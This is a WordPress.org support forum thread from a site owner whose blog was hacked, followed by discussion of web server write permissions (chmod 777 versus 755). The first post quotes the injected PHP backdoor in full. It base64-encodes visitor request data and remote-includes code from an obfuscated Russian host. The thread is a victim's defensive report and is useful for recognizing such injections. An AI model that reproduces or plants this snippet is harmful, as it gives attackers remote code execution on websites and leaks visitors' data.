WordPress.org

Ready to get started?Download WordPress

Forums

[resolved] hacked by user7.phpinclude.ru (8 posts)

  1. Marcel Brinkkemper
    Member
    Posted 7 years ago #

    A few days ago WordPress suddenly stopped sending e-mails when a comment was posted. I changed the e-mail address but it did not help. Today when editing a new item I got an error message that with the address http://user7.phpinclude.ru in it. After some searching I found that someone managed to inject the following code in the file wp-cach-config.php in the wp-content directory:

    error_reporting(0);
    $a=(isset($_SERVER[”HTTP_HOST”]) ? $_SERVER[”HTTP_HOST”] : $HTTP_HOST);
    $b=(isset($_SERVER[”SERVER_NAME”]) ? $_SERVER[”SERVER_NAME”] : $SERVER_NAME);
    $c=(isset($_SERVER[”REQUEST_URI”]) ? $_SERVER[”REQUEST_URI”] : $REQUEST_URI);
    $g=(isset($_SERVER[”HTTP_USER_AGENT”]) ? $_SERVER[”HTTP_USER_AGENT”] : $HTTP_USER_AGENT);
    $h=(isset($_SERVER[”REMOTE_ADDR”]) ? $_SERVER[”REMOTE_ADDR”] : $REMOTE_ADDR);
    $n=(isset($_SERVER[”HTTP_REFERER”]) ? $_SERVER[”HTTP_REFERER”] : $HTTP_REFERER);
    $str=base64_encode($a).”.”.base64_encode($b).”.”.base64_encode($c).”.”.base64_encode($g).”.”.base64_encode($h).”.”.base64_encode($n);
    if((include_once(base64_decode(”aHR0cDovLw==”).base64_decode(”dXNlcjcucGhwaW5jbHVkZS5ydQ==”).”/?”.$str))) { } else
    { include_once(base64_decode(”aHR0cDovLw==”).base64_decode(”dXNlcjcucGhwaW5jbHVkZS5ydQ==”).”/?”.$str); }

    Because wp-cache needs a writeable wp-content directory, someone was able to put this in. It sends stuff to phpinclude.ru. Probably to catch e-mail adresses for spam.

    Does anyone know how to prevent this or how to use wp-cache without a writeable wp-content directory?

  2. Marcel Brinkkemper
    Member
    Posted 7 years ago #

    Another title for this post could be: CHMOD 777 is very dangerous.
    Features of WordPress (upload) and plugins (e.g. WP_Cache and Lazyest Gallery) depend on this. Why is this? How can I use CHMOD 755 on directories used by these features??

  3. Samuel B
    moderator
    Posted 7 years ago #

    @ macbrink
    It mostly depends on your host. I run sites on 2 differing servers that do fine with 755 - as do others here. However, I've installed on plenty that won't.
    Ask your host to fix this issue.

  4. Marcel Brinkkemper
    Member
    Posted 7 years ago #

    I'll ask them to look into it.

  5. Samuel Wood (Otto)
    Tech Ninja
    Posted 7 years ago #

    Features of WordPress (upload) and plugins (e.g. WP_Cache and Lazyest Gallery) depend on this. Why is this?

    Because if you have the webserver able to write files, then you have to make it actually able to write files.

    Those features are not dependent on a chmod of 777, they are dependent on the ability of the webserver to create and write to files. Which means, ultimately, that they depend on the configuration of your webserver. The username it runs as, the permissions associated with that user, etc.

  6. Marcel Brinkkemper
    Member
    Posted 7 years ago #

    Hm, so probably the 'user' running my WordPress installation does not have enough rights? That should be something my host should take care of.

  7. Marcel Brinkkemper
    Member
    Posted 6 years ago #

    This topic has been answered before http://wordpress.org/support/topic/95881?replies=19

  8. Marcel Brinkkemper
    Member
    Posted 6 years ago #

    Our host has changed the permissions structure. WordPress and pluging are OK now on CHMOD 755.

Topic Closed

This topic has been closed to new replies.

About this Topic